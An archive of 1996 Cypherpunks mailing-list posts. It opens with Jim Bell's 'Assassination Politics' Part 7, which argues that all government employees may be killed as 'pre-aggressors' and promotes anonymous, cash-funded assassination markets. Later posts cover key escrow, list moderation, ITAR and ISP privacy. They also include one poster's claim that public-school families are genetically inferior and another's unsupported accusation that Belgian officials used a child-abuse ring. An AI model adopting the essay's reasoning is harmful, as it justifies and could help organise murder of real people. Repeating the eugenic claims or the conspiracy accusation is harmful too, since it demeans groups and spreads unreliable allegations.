You're wrong on at least three counts: I absolutely do claim to be a libertarian, for one. Secondly, while I advocate a system which I call AP, I do not "advocate" the MISUSE of that system for the act of attacking people who have no initiated force or fraud. On the other hand, to be intellectually honest I can't exclude the possibility that this will happen, any more than a libertarian who advocates a free society deny that somebody might abuse the freedoms of that society by initiating force. There is no contradiction here, except in the mind of a person who believes that people can't be given any freedoms it is possible for them to misuse. It's clear you haven't read AP part 7. Here it is; maybe you'll learn something from it. 1. I defend AP from a classical liberal/libertarian position. 2. I don't advocate arbitrary applications of violence and coercion without restriction. 3. I only _advocate_ responding to force/fraud with force. "Assassination Politics" Part 7, by Jim Bell Dear libertarian Friend, I very much understand the concerns you voiced about my idea which I call, "Assassination Politics," because this essay is nothing if it is not radical and extreme. I wrote it, in the middle of last year, partly because I think libertarianism and libertarians in particular need to address what is, if not a "contradiction," is at least an intolerable reality: On the one hand, we are told not to initiate agression, but on the other we are agressed against by the government every time it collects a tax. I much appreciate the way some people I know have "dropped out" of the system, and the guts that such a tactic requires. But that's the problem, I think: Only those with the "guts" do it, which gives the government fewer targets so that it can spend more time attacking the few who oppose it. The reality is that the government STILL collects taxes, and it STILL uses that money to violate our rights. We all know that's wrong. 
My position is quite simple: If tax collection constitutes agression, then anyone doing it or assisting in the effort or benefitting from the proceeds thereof is a criminal. This is quite analogous to current law which prosecutes co-conspirators. While I am not holding out "current law" as some sort of gold-standard of reasonableness that we must always accept, on the other hand I think it's plausible to use it to show that once we have come to the conclusion that taxation is theft, the prescription follows directly by a form of reasoning allegedly acceptable to society: It is reasonable to "attack the attackers" and their co-conspirators, and everyone who is employed by the government is thus a co-conspirator, even if he is not directly involved in the collection of those taxes. That's because he IS involved in _benefitting_ from the proceeds of these taxes, and he presumably provides a certain level of "backup" to the young thugs that governmental organizations often hire. I realize, and you should too, that the "non-agression principle" says nothing about the EXTENT of the self-defense/retaliation that one might reasonably employ in defending one's own rights: In a sense, that sounds like an omission because it at least suggests that a person might "unreasonably" defend himself with lethal force when far less drastic means might normally be called for. For what it's worth, I think most people will behave responsibly. But I think it is pretty straightforward to argue that whatever means are necessary to stop the attack, are reasonable given the terms of the non-agression principle: If a given means are known to be inadequate to actually stop the attack, then further and more serious means are reasonable and called-for. 
To set up a reasonable analogy, if I'm walking down the canonical "dark alley" and am accosted by a man wielding a knife threatening me with it, it is presumably reasonable for me to pull a gun and threaten back, or possibly take the encounter to the final conclusion of gunfire. Even if I should choose to hold my fire and test to determine whether my actions deterred him, I can't see that this possibility binds me morally. And should he advance, despite the gun, as if to attack, I should feel no remorse in shooting him and taking myself out of danger. If you accept the premises so far, you apparently accept the principle that escalation of the self-defense/retaliation is reasonable as long as if the current level of returned counter-threat is inadequate to stop the agression initiated by the other party. To believe otherwise is to believe that ultimately, you are obligated to accept a certain high level of agression simply because you do not have the resources (yet) to resist it. I totally reject this concept, as I hope you would. So if, hypothetically, I could have an anonymous conversation with a hard-nosed government employee, and asked him, "If I killed one of your agents, would you stop trying to collect that tax from me," his predictable reaction would be, "no, we would continue to try to collect that tax." In fact, he would probably hasten to add that he would try to have me prosecuted for murder, as well! If I were to ask if killing ten agents would stop them, again they would presumably say that this would not change their actions. The conclusion is, to me, obvious: Clearly, there is no practical limit to the amount of self-defense that I would need to protect my assets from the government tax collector, and to actually stop the theft, so I suggest that logic requires that I be morally and ethically allowed (under libertarian principles) to use whatever level of self-defense I choose. You raised another objection, that quite frankly I believe is invalid. 
I believe you implied that until a specific level of escalation is reached ( such as the Feds showing up on your doorstep, etc) then it is not legitimate to defend oneself. Delicately, I must disagree. As we all well know, government ultimately operates primarily not on actual, applied force, but simply the threat of future force if you do not comply. True, there are people who have decided to call the government's bluff and simply drop out, but the reality is that this is not practical for most individuals today. This is no accident: The government makes it difficult to drop out, because they extort the cooperation of banks and potential employers and others with which you would otherwise be able to freely contract. In any case, I fail to see how not "dropping out" makes one somehow morally obligated to pay a tax (or tolerate the collection of one). I trust you did not inadvertently mean to suggest this. The reason, morally, we are entitled to shoot the mugger if he waves the knife in our face is that he has threatened us with harm, in this case to our lives, but the threat the government represents to the average citizen (loss of one's entire assets) is just as real, albeit somewhat different. Since government is a past reality, and a present reality, and has the immediate prospects of being a future reality as well, I sincerely believe that the average citizen can legitimately consider himself CONTINUOUSLY threatened. The agression has already occurred, in continuously occurring, and has every prospect of continuing to occur. If anything would justify fighting back, this would. To continue the analogy, if you've been repeatedly mugged by the same guy down the same dark alley for each day of last month, that DOES NOT mean that you've somehow consented to the situation, or that your rights to your assets have somehow been waived. 
With my "Assassination Politics" essay, I simply proposed tht we (as libertarians as well as being ordinary citizens) begin to treat agression by government as being essentially equivalent to agression by muggers, rapists, robbers, and murderers, and view their acts as a continuing series of agressions. Seen this way, it should not be necessary to wait for their NEXT agression; they will have always have been agressing and they will always BE agressing, again and again, until they are stopped for good. At that point, the question shifted to one of practicality: Sure, theoretically we might morally have the "right" to protect ourselves with lethal force, but if they have any reputation at all, government agents have a habit of showing up in large numbers when they actually apply direct force. To take a position that you can only defend yourself when _they've_ chosen the "where" and "when" of the confrontration is downright suicidal, and I hope you understand that I would consider any such restriction to be highly unfair and totally impractical. Understand, too, that the reason we're still stuck under the thumb of the government is that to the extent it's true, "we've" been playing by THEIR rules, not by our own. By our own rules, THEY are the agressors and we should be able to treat them accordingly, on our own terms, at our own convenience, whenever we choose, especially when we feel the odds are on our side. I understand, obviously, that the "no initiation of agression" principle is still valid, but please recognize that I simply don't consider it to be a valid counter-argument to "Assassination Politics," at least as applied to targets who happen to be government agents. They've "pre-agressed," and I don't see any limit to the defenses I should be able to muster to stop that agression completely and permanently. 
Not that I don't see a difference between different levels of guilt: I fully recognize that some of them are far worse than others, and I would certainly not treat a lowly Forest Service grunt in the same fashion as an ATF sniper. Now, there is one more thing that I would hope we could get straight: As I originally "invented" this system, it occurred to me that there could be certain arguments that it needed to be "regulated" somehow; "unworthy" targets shouldn't be killed, etc. The "problem" is, what I've "invented" may (as I now believe it to be) actually a "discovery," in a sense: I now believe this kind of system was always inevitable, merely waiting for the triad of the Internet, digital cash, and good encryption in order to provide the technical underpinnings for the entire system. If that is genuinely the case, then there is no real way to control it, except by free-market principles. It would be impossible, for example, to set up some sort of "Assassination Politics Dictator," who decides who will live and who will die, because competition in the system will always rise to supply every demand, albeit at possibly a very high price. And if you believe the maxim that "absolute power corrupts absolutely," you wouldn't want to accept any form of centralized control (even, perhaps, that of your own!), because any such control would eventually be corrupted. Most rational people recognize this, and I do too. I would not have invented a system where "Jim Bell" gets to make "all the decisions." Quite the contrary, the system I've described absolutely prevents such centralization. That, quite frankly, is the novelty and dare I say it, the beauty of this idea. I believe that it simply cannot be hijacked by centralized political control. 
As I pointed out in the essay, if _I_ were running one of the organizations accepting those donations and offering those prizes, I would selectively list only those targets who I am genuinely satisfied are guilty of the violation of the "non-agression principle." But as a practical matter, there is no way that I could stop a DIFFERENT organization from being set up and operating under DIFFERENT moral and ethical principles, especially if it operated anonymously, as I antipate the "Assassination Politics"-type systems will be. Thus, I'm forced to accept the reality that I can't dictate a "strongly limited" system that would "guarantee" no "unjustified" deaths: I can merely control my little piece of the earth and not assist in the abuse of others. I genuinely believe, however, that the operation of this system would be a vast improvement over the status quo. This, I argue, is somewhat analogous to an argument that we should be entitled to own firearms, despite the fact that SOME people will use them wrongly/immorally/illegally. The ownership is a right even though it may ultimately allow or enable an abuse that you consider wrong and punishable. I consider the truth of such an argument to be obvious and correct, and I know you would too. I realize that this lacks the crisp certitude of safety which would be reassuring to the average, "pre-libertarian" individual. But you are not the "average individual" and I trust that as long-time libertarians you will recognize rights must exist even given the hypothetical possibility that somebody may eventually abuse them. I do not know whether I "invented" or "discovered" this system; perhaps it's a little of both. I do genuinely believe that this system, or one like it, is as close to being technologically inevitable as was the invention of firearms once the material we now know as "gunpowder" was invented. I think it's on the way, regardless of what we do to stop it. 
Perhaps more than anyone else on the face of this planet, this notion has filled me, sequentially and then simultaneously, with awe, astonishment, joy, terror, and finally, relief. Awe, that a system could be produced by a handful of people that would rid the world of the scourge of war, nuclear weapons, governments, and taxes. Astonishment, at my realization that once started, it would cover the entire globe inexorably, erasing dictatorships both fascistic and communistic, monarchies, and even so-called "democracies," which as a general rule today are really just the facade of government by the special interests. Joy, that it would eliminate all war, and force the dismantling not only of all nuclear weapons, but also all militaries, making them not merely redundant but also considered universally dangerous, leaving their "owners" no choice but to dismantle them, and in fact no reason to KEEP them! Terror, too, because this system may just change almost EVERYTHING how we think about our current society, and even more for myself personally, the knowledge that there may some day be a large body of wealthy people who are thrown off their current positions of control of the world's governments, and the very-real possibility that they may look for a "villain" to blame for their downfall. They will find one, in me, and at that time they will have the money and (thanks to me, at least partially) the means to see their revenge. But I would not have published this essay if I had been unwilling to accept the risk. Finally, relief. Maybe I'm a bit premature to say it, but I'm satisfied we _will_ be free. I'm convinced there is no alternative. It may feel like a roller-coaster ride on the way there, but as of today I think our destination is certain. Please understand, we _will_ be free. 
Your libertarian friend,

Jim Bell

Jim Bell
jimbell at pacifier.com

From gbroiles at netbox.com Wed Sep 25 01:34:25 1996
From: gbroiles at netbox.com (Greg Broiles)
Date: Wed, 25 Sep 1996 16:34:25 +0800
Subject: Clipper 3 spec release imminent
Message-ID: <3.0b19.32.19960924225206.006eb8e0@ricochet.net>

According to a story posted to C|net tonight, the Clinton administration will likely release the third Clipper/GAK proposal soon. The article (available at http://www.news.com/News/Item/0,4,3791,00.html ) indicates:

"What the proposal specifies is still a matter of speculation, but an article today in the Daily Report for Executives quotes unnamed U.S. officials saying the plan will raise the ceiling on encryption export controls, institute a key-escrow system, and give the Commerce Department authority to grant export licenses.

If the report is correct, the two big surprises are a new 56-bit limit key length, with export of anything higher subject to key escrow, and the authorizing of the Justice Department--most likely the Federal Bureau of Investigation--to reject any applications for export licenses."

There's a sidebar to the story with several other crypto-related stories, mentioning ProCODE and last Friday's hearing in the Bernstein case.

--
Greg Broiles | "We pretend to be their friends,
gbroiles at netbox.com | but they fuck with our heads."
http://www.io.com/~gbroiles |
|

From aba at dcs.ex.ac.uk Wed Sep 25 01:40:39 1996
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Wed, 25 Sep 1996 16:40:39 +0800
Subject: Banning annoying users
In-Reply-To: <199609241158.HAA27269@envirolink.org>
Message-ID: <199609241609.RAA00235@server.test.net>

> The not allowing unsubscribed individuals to post is logical, for a
> time.

This isn't practical for the reason that many people who read and post to the list are not subscribed to the list. (There are many gateways, local mail->news gateways, etc. eg point your nntp aware news reader at nntp.hks.net.)
Either delete the junk, or subscribe to a filtered list if deleting or not reading posts bothers you enough that you think it worth the risk that the filter owner filters a few posts that you would have found interesting. (killfiling on address is not possible for remailer, and content of unattributed unsigned anonymous posts is difficult to automatically filter). Adam From eyethink at cse.ucsc.edu Wed Sep 25 01:42:47 1996 From: eyethink at cse.ucsc.edu (Carl A. Wescott) Date: Wed, 25 Sep 1996 16:42:47 +0800 Subject: wanted: cryptographers and security consultants Message-ID: <199609250408.VAA16237@arapaho.cse.ucsc.edu> WANTED: CRYPTOGRAPHERS AND SECURITY EXPERTS ------------------------------------------- I am consulting at a technology company which is supplying electronic commerce solutions. We need security experts, hackers/crackers, & programmers, to help in performing blackbox and clearbox penetration testing of the systems/server and the front-end client/product. We also seek collaborators who can help us with security policy review and programmers who can help us implement our visions. Interested parties please contact me via email or at 415 380 8100. Thanks, --C; From Adamsc at io-online.com Wed Sep 25 01:42:47 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 25 Sep 1996 16:42:47 +0800 Subject: Public Schools Message-ID: <19960925051617328.AAA184@IO-ONLINE.COM> On Sun, 22 Sep 1996 15:40:32 -0700, Timothy C. May wrote: >>> thru about the 3rd or 4th grade, and I do agree that most of todays schools >>> are shit, however there is one area--social skills--that homeschooling >>> simply can't compete. Children need to learn how to interact with one another >>in a certain area get together. Homeschooling does not have to stand in >>the way of a normal socialization process. >Also--and I mean this point completely seriously!--many parents are not >altogether convinced that the "public school socialization" is all that >beneficial. 
Do kids really _need_ to learn to wear gang colors, smoke to be >cool, get pregnant at age 14, and so on? >I think the "social skills" Snow talks about above are actually the _worst_ >part of public schools in fin-de-Siecle America. If I had a kid, I wouldn't >want him or her in the local public schools. I'd have to disagree with you on this. Based on my experience in 3 widely different districts, such behaviour/problems isn't likely to result from the school environment. It's a function of the family life these kids have. If they come from a dysfunctional family, kids are going to join gangs, get pregnant, use drugs, etc no matter what school they're at. If they have the right background, it's not going to happen. Of course, in some areas (esp. inner cities) the rate of social dysfunction is extremely high, so some schools are 90% 'problem-kids' as well. I'd recommend against having a homeschooled kid go to one of those (unless you've been using the Cypherpunks Homeschool Plan For the Instruction of the 3 Rs, Martial Arts, Bomb-Making, Assassination and Black-Helicopter Countermeasures. I imagine school would be very popular if some list members were teaching) just because it would significantly reduce the opportunity for them to catch a stray bullet or something. I still doubt that a homeschooled kid from a strong family would join these groups. From aba at dcs.ex.ac.uk Wed Sep 25 01:47:45 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Wed, 25 Sep 1996 16:47:45 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: <199609241328.JAA12601@sherry.ny.ubs.com> Message-ID: <199609241621.RAA00240@server.test.net> Paul writes: > i was under the impression that germany's goal was to stop the distribution > of radikal 154 by xs4all, not by 50 mirror sites. they seem to have > accomplished their goal. do you really think that they will let a little > thing like reason stand in their way when claiming victory? They lost: it is still available. 
If they went after another mirror the number of mirrors would double :-) Someone in the German press needs to rub their noses in the fact that they lost, say by printing a list of URLS, or just mentioning the number of mirrors, and the different countries they are located in. The need to translate the quote: `The internet sees censorship as damage, and routes around it' and put that in big letters. Any German net freelance journalists reading? Adam -- #!/bin/perl -sp0777i I don't know if anyone else has seen this, but I was mailing letters in the "out front" boxes the other day when I noticed a sign. The sign said that all packages 16 ounces or over had to be taken inside for disposal into the mail slot. The obvious explanation being that even though you can abstain from marking a return address, the postal inspectors would like a nice photo of you with your mail. Greg Kucharo sophi at best.com "If you want facts, buy an almanac" -The Daily Iowan From erp at digiforest.com Wed Sep 25 02:09:24 1996 From: erp at digiforest.com (Jay Gairson) Date: Wed, 25 Sep 1996 17:09:24 +0800 Subject: Public Schools In-Reply-To: <20uRuD1w165w@bwalk.dm.com> Message-ID: First off, what does this have to do with cryptography? or anything cypher for that matter? On Tue, 24 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > Phil Fraering writes: > > > On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > > > > > > > U.S. public school system is darwinian evolution in action. Parents who can > > > afford to send their kids to private schools, do so. Parents who send their > > > kids to public schools deserve to have their offsprings fucked up, mentally > > > and physically, to improve the species' gene pool. So, basically you're saying, since my parents cannot afford to pay for a private school for me, we are genetically inferior to those who can? Because hate tell ya, but I've ran into some major idiots that go to private schools. 
Also to consider that from the school I go to, last year we had two perfect sat scores (no problems missed). > > > > But the cutoff is often whether the parents can afford to send their kids > > to private school, not whether or not they're genetically superior. > > You must have attended a public school if you don't understand that genetic > superiority leads to economic success. My older kid goes to a private school. > The parents are obviously genetically superior to public school parents. I am assuming from what you have said in that statement, that you believe since he may have gone to a public school, it has made him have the opinion he does? Also, in your statement that your older kid goes to a private school, and that the parents are obviously genetically superior to public school parents. You seem to be saying that YOU are genetically superior to my parents? Another thing to consider here is, from this line of statements, you are saying that children who have parents who made it well in, let us say the movie business (or even drug business), and then send their children to public schools, are genetically superior because they can act (lie) better than my parents. For if this is so, that must mean that my aunt is genetically superior to my mother (who is a teacher at a private school, but she did not go to a private school) and to her parents, for she is making more money, and if she ever has children they will be genetically superior to me, because they will have more money? Just wanting this cleared up please.. It kind of confuses poor little 'ol me who is just a lousy senior in a public school (and scored 1560 on my SAT, as if that means anything, just means I have a good memory), since from what you say I must be stupid, because my parents only make 50 to 60k$ per year between the two of them (My father being an AutoCad Design Consultant, and my Mother a LD (Learning disabled) Teacher at a public school)? 
> > > And the reason it costs so much to send a kid to private school is that > > everyone's already paying for a more expensive public school thanks to all > > the taxes. True, but also depends on where you are at. Some states have cheaper taxes (Nevada for instance), compared to others. > > Push vouchers. What's the cryptorelevance of your comments, anyway? > Umm, were you not the one that started this conversation? > > > There are plenty of excellent private elementary and secondary schools in t > > > U.S. Children who deserve better schooling (by virtue of having parents who > > > have better genes and are therefore economically successful) get it. > > > > So if I'm economically successful it'll change my genes? > > > > I guess this is the famous Russian belief in Lamarckianism in action. From the sounds of what he said, Lamarck was 100 Percent correct, and Darwin and (that other guy, name just slipped my mind, must be those genetically inferior genes of mine)? > No, on the contrary, sending poor kids to good schools on scholarships > does not improve their genes. They tend to become drug dealers. Hate to inform you on this but, it is more often than not the children sent by their rich mama and papa to school, that end up on drugs or as drug dealers, than the ones that start out with scholarships (For the ones with scholarships have more to lose, than the ones with the rich mama and papa, for the rich mama and papa can afford the big expensive lawyer.). Just look at the studies and such done on this type of area. Also you have to consider that generally the ones that end up as drug dealers, are the children who have parents that were drug dealers and such or had experience in such, or just had parents who didn't care what they did. Ok, now back to something crypto related ok? Though I am rather interested in this subject. Boy oh boy, someone has a possibly inferiority complex here... 
From Adamsc at io-online.com Wed Sep 25 02:09:43 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 25 Sep 1996 17:09:43 +0800 Subject: Taking crypto out of the U.S. Message-ID: <19960925060114140.AAA186@IO-ONLINE.COM> On Tue, 24 Sep 1996 07:01:51 -0700, Dale Thorn wrote: >> Soon I am going to be going overseas to Japan, and I want to take >> my notebook with me so I can keep up with everything, however, I have >> encrypted my hard drive and usually encrypt my mail. Is this in >> violation of the ITAR to keep everything the same when I go over? >Bad enough now that many places require you to put your laptop computer >through the big gray x-ray machine (no exceptions in some places, >especially federal buildings in the U.S.), but if they start requiring >you to list individual files (?????). Very high potential for abuse here! Under HPFS (OS/2's file system) each file takes a minimum of 512 bytes. On your average $200 2GB drive, that'd be around 4194304 files. I wonder if they have that much printer paper? (Particularly to handle those fully qualified filenames...) Now, if you were some sort of evil-cypherpunk-hacker, you might have a hacked copy of Linux that has some really "creative" file systems (The fractal file system - 5 trillion files and counting) and puts that to shame. Even better, have something equivalent to a source-code shrouder that would go through and create a bunch of random looking file names (Was PGP 0e3ahjw2.exe or 052a6v62.obj?) In other words, I have a feeling this would fly about as far as a V-22. From attila at primenet.com Wed Sep 25 02:32:37 1996 From: attila at primenet.com (attila) Date: Wed, 25 Sep 1996 17:32:37 +0800 Subject: The Iron Lady almost on target Message-ID: <199609250528.XAA03556@InfoWest.COM> The Iron Lady launched into an attack against government regulations, political correctness, and a licentious society. Let's run her for President. 
she couldn't be any worse than Bubba or Dolt --and she might terrorize half or more Washington. ------ Forwarded ------ London Daily Telegraph for 25 Sep 95 Thatcher hits out at moral 'corrosion' [Anonymized]

LADY Thatcher spoke out against the "licentiousness" of the permissive society last night and said that children were being brought up in a morally corrosive atmosphere.

The former Prime Minister expressed her distaste for the coarsening of popular culture in a lecture in London which praised the enduring values and institutions of American civilisation. On the day in which the annual crime figures showed the first overall increase in Britain for several years, she also lamented the steady decline in law and order which had rendered everyone "less secure than we of a right should be".

She said: "From the most heinous acts of terrorism to the petty burglar and street corner mugger, we are confronted by those for whom words such as 'justice' and 'right' have no meaning. We see around ourselves the licentiousness of modern society manifested in popular culture. We have witnessed a coarsening of everything from art to music to literature and film. But for some people there seems to be nothing beyond the pale, for them freedom has no limits."

Lady Thatcher did not specify the targets of her criticism, but went on to accuse those who advocated unrestrained freedom of expression as perverse, demeaning and dangerous. She said: "The younger generation is being reared in a morally corrosive atmosphere where they are taught that in the name of liberty, anything goes. There is no elevation of the human spirit in works designed merely to shock or to appeal only to our most base instincts."

Lady Thatcher's vigorous defence of the rule of law reprised a familiar theme from her period of office in Downing Street, when the Conservatives were themselves accused of fuelling the rise in lawlessness by putting too great an emphasis on individualism.

However she did not refer to the present Government and its internal difficulties at all, except to warn in passing of what she saw as the dangers posed by the Labour Party or bureaucrats in Brussels. She said: "If we should be enticed once more down the rutted and muddy road of socialism, we will again find Britain mired in a morass of stifling regulations and government controls."

In a sustained attack on state-enforced egalitarianism, Lady Thatcher also hit out at the fashion for political correctness as "the guiding sentiment of tyrants in every age" who believed that if they controlled what people read, they controlled the people themselves.

Delivering the inaugural James Bryce lecture for London University's Institute of United States Studies, Lady Thatcher called for more serious study of the history and culture of America to understand the exceptional role the US had played in world affairs. It had served as a beacon of enlightenment in the struggles against German imperialism, fascist aggression and communist tyranny during this century, and would dominate the next.

She said: "We are confronted by a stream of dictators and tyrants who will seek to dominate those nations around them, if not the entire world. The deepest conflicts between men will not subside, nor can they subside until the basic principles of individual liberty and political freedom are embraced throughout the world."

Lady Thatcher said that too much talk of "rights" was in danger of overwhelming the importance of duty and responsibility in a free country. She said: "In the process, liberty decays into licence in an atmosphere where all is permitted and nothing prohibited. The resulting permissive society is in fact no society at all. It is little more than a state of nature where the line between right and wrong is first blurred and then obliterated - a place where no one dares to say no. There can be no order without authority, and authority that is impotent or hesitant in the face of intimidation, crime and violence, cannot endure."

She challenged the modern assumption that progress was the general rule and corruption the exception. Often, it was the other way around. "Freedom and civilisation are conditions that require great effort, deep thought, and unwavering commitment," she said.

From dthorn at gte.net Wed Sep 25 02:48:13 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 25 Sep 1996 17:48:13 +0800 Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!] In-Reply-To: Message-ID: <3248DE04.5363@gte.net> Simon Spero wrote: > On Tue, 24 Sep 1996, attila wrote: > > NO, I will not outright reject Jim Bell's "Assassination Politics." > Assassination politics is impossible to defend from a classical > Liberal/Libertarian position. Bell advocates arbitrary applications of > violence and coercion without restriction. There is no way to justify > the initiation of force without abandoning any pretence of being a > Libertarian (which, to be fair, Bell doesn't claim to be). I understood the intent of AP was to take powers the government is already exercising (unconstitutionally), and merely transfer some of them to the people, as it were. Isn't this true democracy (if a rather perverse kind)? Maybe you should consider that, in the final analysis, Mr. Bell may not so much want all of us to have responsibility for killing as he does want to remove the govt's "arbitrary applications of violence and coercion without restriction", and AP is just your wake-up call. Maybe, instead of having to face the (alleged) horror of AP, you could join with other like-minded citizens and stop these atrocities from the top down, if you have the nerve to go toe-to-toe with "the real killers", government-style. From geeman at best.com Wed Sep 25 03:00:04 1996 From: geeman at best.com (geeman) Date: Wed, 25 Sep 1996 18:00:04 +0800 Subject: [Fwd: Int'l Crypto Resolution Released in Paris] Message-ID: <3248CF35.6A54@best.com> An embedded message was scrubbed... 
From: unknown sender Subject: no subject Date: no date Size: 3550 URL: From paul.elliott at Hrnowl.LoneStar.ORG Wed Sep 25 03:09:37 1996 From: paul.elliott at Hrnowl.LoneStar.ORG (Paul Elliott) Date: Wed, 25 Sep 1996 18:09:37 +0800 Subject: ISPs' information on users In-Reply-To: Message-ID: <3248cca9.flight@flight.hrnowl.lonestar.org> > > On a more serious note, perhaps legal experts here could comment on > something I've been wondering about. Could ISPs in the U.S. be compelled to > report on the browsing and net surfing habits of their customer base? > > To make this clear, I don't mean in a specific criminal case, where the > records are searchable under a warrant. I mean a blanket order that all > ISPs compile and forward records. Let's get some of the cypherpunk legal types to comment on the following idea which is probably completely wrong: It is probably illegal for the ISP to keep such records in the first place! When I open a link to a remote WEB page or use FTP to retrieve a remote file, the software on my computer first forms a network connection between a program on my local computer and a remote "server" program at the remote site. The ISP provides hardware and software "in the middle" that allows this connection to take place. After this connection is established, the connection itself is used to negotiate the precise data I want (i.e. the filename in the case of FTP or the non-site portion of the URL in the case of the WEB). In order for the ISP to keep records of my browsing, it would have to snoop on this connection. But the connection is an electronic communication within the meaning of the Electronic communications privacy act (ECPA). Thus it is not legal for the ISP to keep such information. Thus the ISP can not report on the browsing habits and net surfing habits of its user base by complying with the law and never keeping the records in the first place. Perhaps the above does not apply to the site name of the connections. 
OK, cypherpunk legal types, tell me if I got the above wrong? -- Paul Elliott Telephone: 1-713-781-4543 Paul.Elliott at hrnowl.lonestar.org Address: 3987 South Gessner #224 Houston Texas 77063 From dthorn at gte.net Wed Sep 25 03:13:08 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 25 Sep 1996 18:13:08 +0800 Subject: The Nature of the Cypherpunks List In-Reply-To: <199609241913.PAA19989@jekyll.piermont.com> Message-ID: <3248D7E9.C0A@gte.net> Re: below whimpering/whining/sniveling. Why don't you guys learn to use your computers? People who write this stuff must be thinking something like: "Gee, that cypherpunks list has SO much good info on it, I can't stand to not keep track of what's going on there. But those occasional irritating posts just upset me so much, I can't deal with it, so I better get it off of my chest and tell everyone. Oh, I feel so much better now, maybe they'll let me go home today." Perry E. Metzger wrote: > Timothy C. May writes: > > While some folks would rather we talked only about "crypto," just > > how many times can basic questions about Diffie-Hellman, or RSA, or > > elliptic curves be discussed? > I think a better question is "do we need to have to make sure people > are posting for the sake of posting? Why must we have a charter broad > enough to generate too much volume to allow conversation?" > Sure, there is a limit to what can be said about cryptography and the > direct politics of cryptography. *THAT IS THE POINT*. That is why I'm > starting a new list -- so that I can abandon this waste heap to those > that like frolicking in the mire. > > And as I was there at the initial planning meeting in July of '92, > > and then at the first physical meeting, I can assure you that what > > soon became "Cypherpunks" was never intended to be an announcement > > list for research discoveries in mathematical cryptography! > No. It was intended for discussion of cryptography *and* the politics > of cryptography. 
Not theories about some airliner was shot down by > aliens, not random musings on "assassination politics". The idea was > never to be restricted just to the technical aspects of cryptography, > but the notion was to have a place where the non-technical discussion > also was on *cryptography*. This list no longer has *any* charter. A > posting on sexual practices in Botswana is probably as "on topic" as > anything else these days. > The new list, however, will have a charter, and it *will* be enforced. > > Much as some have been shrilly claiming "This list is for crypto and > > programming discussions only," this was *never* the intent. > Tim, I hate to say this, but cypherpunks is a sewer which has driven > off anyone seriously interested in the area, and you are part of the > reason. > > The serious crypto researchers, e.g., the Matt Blazes, the Whit > > Diffies, and the Carl Ellisons of the world, have various channels > > they use to communicate in. > For those who can think back a few years, this *used* to be one of > those fora. No longer, of course. This is not for people serious about > anything. I no longer read 99% of what is posted here -- it's drek. > I do not believe it would be good, however, for the list to be shut > down, because there have to be sewers to carry the world's > intellectual waste products, and if this list did not exist the likes > of Jim Bell and the others would be out causing harm on other mailing > lists. > PS Still looking for a solid site that can host a 1500 member > significant volume mailing list without choking. From Adamsc at io-online.com Wed Sep 25 03:44:09 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 25 Sep 1996 18:44:09 +0800 Subject: Snooping ISP admin?? Message-ID: <19960925052720218.AAA216@IO-ONLINE.COM> On Mon, 23 Sep 1996 08:30:34 -0700 (PDT), Eric Murray wrote: >> encountered "POP3 account in use by another user" several times in the >> past few days and I am the only user... 
wondering if that "in use" >> message is the result of a clumsy sysadmin being caught with his hand >> in the cookie jar. >> Any thoughts from the group??? > >If the sysadmin is reading your PGP mail, let him. It's very very >unlikely that he has the resources available to crack a PGP >message in this century. And if he does, his machine should be fast enough to read the entire mailbox before Michael could notice... From gregburk at netcom.com Wed Sep 25 03:47:35 1996 From: gregburk at netcom.com (Greg Burk) Date: Wed, 25 Sep 1996 18:47:35 +0800 Subject: Not reputation again! (Was: The Nature of the Cypherpunks List) Message-ID: <54f2rzdf7l@netcom.com> -----BEGIN PGP SIGNED MESSAGE----- I know, I said I was through arguing "reputation theory" and I really thought I was, but this latest impelled me to say more. tcmay at got.net (Timothy C. May) writes: > --Tim May, whose reputation is, like the list, whatever it is, for whatever > reasons, and who thus needs no defenders Indeed, your reputation needs no defenders among those of us who know you directly (if electronically) But here's something for you to think over: If there are such things as negative reputations, why hasn't your reputation zoomed to godlike status upon the ... let us say unreserved... condemnations of the Poster With Nothing Better To Do, if s/he has a negative reputation (I presume you would say so) You could contend that his/her reputation is positive, but if that's positive, what isn't? This would appear to concede my point. You could contend that the Poster With Nothing Better To Do's reputation is balanced precariously at exactly 0. I would find that a big stretch, and as above, if that's 0, what's negative? Or you could contend that there's no such thing as collective reputation, but I think there are two major flaws: His/her 1-to-1 "reputations" clearly add up to a collective consensus among us annoyed cpunk readers. 
Even if you contend that reputations in general do not behave collectively, it is no defense in this case at least. And I think if "reputation theory" predicts no collective behavior, it must be pretty weak. > But there comes a point where I need to speak up. (By the way, somebody > even sent me a bizarre message, saying: "I am not quite sure why you have > not shot back at Dr Virmin and his cause. Maybe that is the best way? Or > are you guilty as charged?" So, to some, my silence means I might be > guilty. Jeesh.) Because s/he can *never spend reputation down to zero*. BTW, your example is reflected in politics too. A charge that goes unanswered is assumed true by many. Just ask Michael Dukakis. Frankly, I think you should just admit that your reputation theory is flawed and rethink it. I would be interested in hearing it, but what you have now is IMHO badly flawed. -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQBVAwUBMkjPErMyVAabpHidAQFmVAH/XJ8GqayxiJOKv/5obx7MPcFX9VUJSldJ M/Vh4OBN3PYytw8TKvzxwcvJAqCjSA7AfZZZAgzfb9UMCetR4wZv8g== =5HgH -----END PGP SIGNATURE----- From dthorn at gte.net Wed Sep 25 04:09:40 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 25 Sep 1996 19:09:40 +0800 Subject: More proposals for European censorship In-Reply-To: Message-ID: <32487022.21FA@gte.net> Asgaard wrote: > On Mon, 23 Sep 1996, Peter Trei wrote: > > > It's probably no coincidence that the recently busted, utter > > > horrible child-molesting ring, with obvious protection from > > > various persons in the establishment, was centered in Belgium - > > > that's where the EU bureaucrat nomenklatura play their power games > > > and go to bordellos. > > What exactly are you suggesting when you say 'it's probably no > > coincidence?" I can't quite figure it out. > Obviously not only the arrested killer used the schoolgirls chained > in underground cells. They were for hire. High officials used his > 'services', then ordered the police to cover it up. 
